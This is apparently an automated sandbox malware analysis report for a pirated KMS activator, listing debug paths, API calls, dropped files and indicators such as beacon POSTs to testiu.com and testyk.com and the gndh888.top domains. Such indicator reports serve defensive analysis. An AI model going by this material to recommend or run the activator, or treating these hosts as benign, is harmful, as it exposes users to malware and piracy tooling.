Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\DvLayout.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, DvLayout.exe, 0000000B.00000000.1267571184.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe, 0000000B.00000002.1275429257.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe.1.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb@F source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe0.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\DvLayout.pdb9 source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, DvLayout.exe, 0000000B.00000000.1267571184.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe, 0000000B.00000002.1275429257.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe.1.dr
Source: Binary string: Q:\christoh\Projects\KMS-HGM\Release\KMS-Client.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, kms-client.exe.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wdlogin.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: )}D:\Office\Target\x64\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Office\Target\x86\ship\licensing\x-none\CleanO15SPP.pdb4U source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe.34.dr
Source: Binary string: msvcr100.i386.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, msvcr100.dll.34.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe0.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wrme.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr
Source: Binary string: \LookFile\KMDF_LOOK\Release\KMDF_LOOK_32.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: W:\SECOPatcher\temp\Release\x64\SECOPatcher\SECOPatcher.pdb source: 7Z.EXE, 00000022.00000003.1322653977.0000000000750000.00000004.00001000.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: F:\20201028P\KMDF_Protect\Release\KMDF_Protect_32.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Office\Target\x86\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe.34.dr
Source: Binary string: D:\Office\Target\x64\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe0.34.dr
Source: Binary string: E:\work\Icon_Report\Release\_service.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe, 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000000.1250640362.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, J8156NOVDEC.exe, 00000003.00000000.1258172666.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, J8156NOVDEC.exe, 00000003.00000002.2505697815.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, _J8156NOVDEC.exe.1.dr, J8156NOVDEC.exe.2.dr, nsjB6CE.tmp.1.dr
Source: Binary string: \LookFile\KMDF_LOOK\Release\KMDF_LOOK_64.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wccenter.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, wccenter.exe.1.dr
Source: Binary string: Z-D:\Work\Install_Driver\Driver_helper\Release\wrme.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.dr
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00405F2F FindFirstFileA,FindClose,1_2_00405F2F
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_004064DB DeleteFileA,CloseHandle,lstrcatA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004064DB
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exeCode function: 1_2_00402C3F FindFirstFileA,1_2_00402C3F
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006DFA19 FindFirstFileExW,2_2_006DFA19
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeCode function: 3_2_00C9FA19 FindFirstFileExW,3_2_00C9FA19
Source: C:\Windows\System32\drivers\DvLayout.exeCode function: 11_2_00396627 FindFirstFileExW,11_2_00396627
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exeCode function: 17_2_00ED31AF FindFirstFileExW,17_2_00ED31AF
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,34_2_0040B174
Source: C:\Windows\_temp07242019502489\7Z.EXECode function: 34_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,34_2_0040B6E9

Networking

barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 3 127.1
Source: global trafficHTTP traffic detected: POST /api/v1/p HTTP/1.1Host: da.testiu.comAccept: */*Content-Type:application/x-www-form-urlencoded; charset=UTF-8; image/gif;Content-Length: 0
Source: global trafficHTTP traffic detected: POST /api/v1/p HTTP/1.1Host: db.testyk.comAccept: */*Content-Type:application/x-www-form-urlencoded; charset=UTF-8; image/gif;Content-Length: 0
Source: Joe Sandbox ViewIP Address: 103.224.212.211 103.224.212.211
Source: Joe Sandbox ViewIP Address: 72.52.179.174 72.52.179.174
Source: Joe Sandbox ViewIP Address: 103.235.46.96 103.235.46.96
Source: Joe Sandbox ViewIP Address: 103.235.46.96 103.235.46.96
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exeCode function: 2_2_006622E0 recv,WSAGetLastError,2_2_006622E0
Source: global trafficHTTP traffic detected: GET /s?ie=utf-8&wd=ip HTTP/1.1User-Agent: UrlTest1Host: www.baidu.com
Source: global trafficDNS traffic detected: DNS query: www.baidu.com
Source: global trafficDNS traffic detected: DNS query: du.testjj.com
Source: global trafficDNS traffic detected: DNS query: da.testiu.com
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: global trafficDNS traffic detected: DNS query: db.testyk.com
Source: unknownHTTP traffic detected: POST /api/v1/p HTTP/1.1Host: da.testiu.comAccept: */*Content-Type:application/x-www-form-urlencoded; charset=UTF-8; image/gif;Content-Length: 0
Source: svchost.exe, 00000016.00000002.2513917571.000002C2B7400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.22.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000016.00000003.1281171307.000002C2B7190000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drString found in binary or memory: http://helgeklein.com
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drString found in binary or memory: http://helgeklein.com.
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drString found in binary or memory: http://helgeklein.com/setacl/
Source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr, SetACL.exe0.34.drString found in binary or memory: http://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk1.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk2.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk3.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rk3.gndh888.tophttp://rk4.gndh888.tophttp://rk1.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk4.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk5.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rk5.gndh888.tophttp://rk6.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.drString found in binary or memory: http://rk6.gndh888.top
Source: KMDF_LOOK.sys.1.drString found in binary or memory: http://rk7.gndh888.top
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rk7.gndh888.tophttp://rk2.gndh888.top-sc=
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe.1.dr, KMDF_LOOK.sys.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, DvLayout.exe.1.dr, wccenter.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe.1.dr, KMDF_LOOK.sys.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, DvLayout.exe.1.dr, wccenter.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: http://sf.symcb.com/sf.crt0
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe.1.dr, KMDF_LOOK.sys.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, DvLayout.exe.1.dr, wccenter.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: http://sf.symcd.com0&
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slayeroffice.com/tools/modi/v2.0/modi_help.html
Source: svchost.exe, 0000001C.00000002.2508919477.00000254A4702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.2508107758.00000254A3E87000.00000004.00000020.00020000.00000000.sdmp, regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.28.drString found in binary or memory: http://standards.iso.org/iso/19770/-2/2009/schema.xsd
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://validator.w3.org/
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b2
Source: wrme.exe, 00000011.00000003.1323957817.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323633808.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323988394.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323514417.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1324021871.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1324021871.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323514417.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1323633808.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b2dc-6815f4609260
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1
Source: wrme.exe, 00000011.00000003.1337368888.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1337368888.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338495650.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338652221.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338573283.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1337892131.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1337892131.0000000000F7F000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000003.1338652221.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339840197.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a132-0ab44d06a73d
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a1Y
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/forum/
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/forum/index.php?showtopic=19368
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/images/autoit_6_240x100.jpg
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe, 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000000.1250640362.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, J8156NOVDEC.exe, 00000003.00000000.1258172666.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, J8156NOVDEC.exe, 00000003.00000002.2505697815.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, _J8156NOVDEC.exe.1.dr, J8156NOVDEC.exe.2.dr, nsjB6CE.tmp.1.drString found in binary or memory: http://www.baidu.com/s?ie=utf-8&wd=ipUrlTest1
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000130C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/s?ie=utf-8&wd=ipm
Source: J8156NOVDEC.exe, 00000003.00000002.2507675639.000000000130C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/s?ie=utf-8&wd=ipw
Source: svchost.exe, 00000005.00000002.1374180944.00000211DEE13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
Source: HEU_KMS_Activator.exeString found in binary or memory: http://www.ccav1.com
Source: HEU_KMS_Activator.exeString found in binary or memory: http://www.ccav1.comError
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509996938.00000000019FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.debugbar.com/
Source: HEU_KMS_Activator.exe, 00000004.00000002.2509398500.00000000018C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fiddlertool.com/fiddler/
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.3
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: J8156NOVDEC.exe, J8156NOVDEC.exe, 00000003.00000002.2505833885.0000000000CBD000.00000004.00000001.01000000.00000006.sdmp, J8156NOVDEC.exe, 00000003.00000000.1258257647.0000000000CBD000.00000008.00000001.01000000.00000006.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, _J8156NOVDEC.exe.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: J8156NOVDEC.exe, wrme.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe.1.dr, KMDF_LOOK.sys.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, DvLayout.exe.1.dr, wccenter.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: https://d.symcb.com/cps0%
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe.1.dr, KMDF_LOOK.sys.1.dr, J8156NOVDEC.exe.2.dr, wuhost.exe.1.dr, DvLayout.exe.1.dr, wccenter.exe.1.dr, wrme.exe.1.dr, nsjB6CE.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wuhost.exe.1.dr, wrme.exe.1.drString found in binary or memory: https://da.testiu.com
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://da.testiu.com/api/v1/p
Source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wuhost.exe.1.dr, wrme.exe.1.drString found in binary or memory: https://db.testyk.com
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db.testyk.com/api/v1/p
Source: wrme.exe, 00000011.00000002.1339700172.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db.testyk.com/api/v1/ppk?
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374424171.00000211DEE70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000005.00000003.1373416662.00000211DEE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000005.00000003.1373220888.00000211DEE74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374445423.00000211DEE76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000005.00000003.1373456417.00000211DEE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373596706.00000211DEE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374376427.00000211DEE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000005.00000002.1374208141.00000211DEE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1374406045.00000211DEE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373416662.00000211DEE67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000005.00000002.1374333370.00000211DEE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1373665727.00000211DEE57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
